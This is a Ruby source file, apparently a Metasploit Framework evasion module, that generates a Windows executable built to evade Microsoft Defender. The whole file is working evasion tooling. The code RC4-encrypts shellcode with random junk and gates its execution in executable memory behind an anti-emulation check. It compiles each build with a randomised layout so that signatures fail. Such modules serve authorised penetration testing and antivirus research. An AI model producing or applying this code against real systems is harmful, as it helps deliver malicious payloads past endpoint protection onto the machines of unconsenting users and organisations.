metasploit-framework/modules/evasion/windows/windows_defender_exe.rb


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/compiler/windows'
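# Builds a Windows x86 EXE whose shellcode sits RC4-encrypted in the binary
# and is only decrypted and run after a cheap anti-emulation probe passes.
# Caveat for operators: RC4 here is obfuscation against static scanning, not
# a confidentiality control; the key is embedded in the EXE as a C string.
class MetasploitModule < Msf::Evasion

  # Module metadata. `info` is merged over these defaults by Msf::Evasion.
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Microsoft Windows Defender Evasive Executable',
        'Description' => %q{
          This module allows you to generate a Windows EXE that evades against Microsoft
          Windows Defender. Multiple techniques such as shellcode encryption, source code
          obfuscation, Metasm, and anti-emulation are used to achieve this.

          For best results, please try to use payloads that use a more secure channel
          such as HTTPS or RC4 in order to avoid the payload network traffic getting
          caught by antivirus better.
        },
        'Author' => [ 'sinn3r' ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_X86,
        'Targets' => [ ['Microsoft Windows', {}] ]
      )
    )
  end

  # RC4 key used both to encrypt the shellcode at build time and, as a C
  # string literal, to decrypt it at run time. Memoised so the buffer and the
  # interpolated key never disagree. Alphabetic only, so it needs no escaping
  # inside the C source. Rex's RNG is fine for uniqueness; it is not a secret.
  def rc4_key
    @rc4_key ||= Rex::Text.rand_text_alpha(32..64)
  end

  # Encrypted payload rendered as C. Returns a Hash:
  #   :size     - byte length of shellcode plus trailing junk
  #   :c_format - C source declaring `buf` holding the RC4-encrypted bytes
  # Random junk is appended so length and ciphertext differ on every build.
  # Memoised because c_template interpolates it more than once.
  def get_payload
    @c_payload ||= begin
      rc4_opts = { format: 'rc4', key: rc4_key }
      junk = Rex::Text.rand_text(10..1024)
      blob = payload.encoded + junk
      {
        size: blob.length,
        c_format: Msf::Simple::Buffer.transform(blob, 'c', 'buf', rc4_opts)
      }
    end
  end

  # C source that gets compiled into the final EXE.
  #
  # The OpenProcess(PROCESS_ALL_ACCESS, PID 4 /* System */) probe is expected
  # to FAIL (NULL) on a real host, so the decrypt-and-jump path runs only when
  # the handle is NULL; emulators that hand back a fake handle skip it.
  #
  # Fix vs. the original: VirtualAlloc() failure is now checked before the
  # buffer is touched instead of dereferencing NULL in memset().
  # Not changed: memory is mapped RWX (0x40 == PAGE_EXECUTE_READWRITE), which
  # is itself a common heuristic signal; a RW->RX flip via VirtualProtect would
  # be the usual hardening but needs that symbol in the bundled headers.
  def c_template
    @c_template ||= %Q|#include <Windows.h>
#include <rc4.h>

// The encrypted code allows us to get around static scanning
#{get_payload[:c_format]}

int main() {
  // sizeof(int) multiplier over-allocates by 4x; harmless, kept as-is
  int lpBufSize = sizeof(int) * #{get_payload[:size]};
  // 0x00000040 == PAGE_EXECUTE_READWRITE
  LPVOID lpBuf = VirtualAlloc(NULL, lpBufSize, MEM_COMMIT, 0x00000040);
  if (lpBuf == NULL) {
    return 0;
  }
  memset(lpBuf, '\\0', lpBufSize);
  // 0x1F0FFF == PROCESS_ALL_ACCESS; PID 4 is the System process
  HANDLE proc = OpenProcess(0x1F0FFF, false, 4);
  // Checking NULL allows us to get around Real-time protection
  if (proc == NULL) {
    RC4("#{rc4_key}", buf, (char*) lpBuf, #{get_payload[:size]});
    void (*func)();
    func = (void (*)()) lpBuf;
    (void)(*func)();
  }
  return 0;
}|
  end

  # Prints the generated C (VERBOSE only - note it contains the RC4 key),
  # compiles it with a randomised layout so every build hashes differently,
  # and writes the resulting EXE to disk.
  def run
    vprint_line(c_template)
    # The randomized code allows us to generate a unique EXE
    bin = Metasploit::Framework::Compiler::Windows.compile_random_c(c_template)
    print_status("Compiled executable size: #{bin.length}")
    file_create(bin)
  end
end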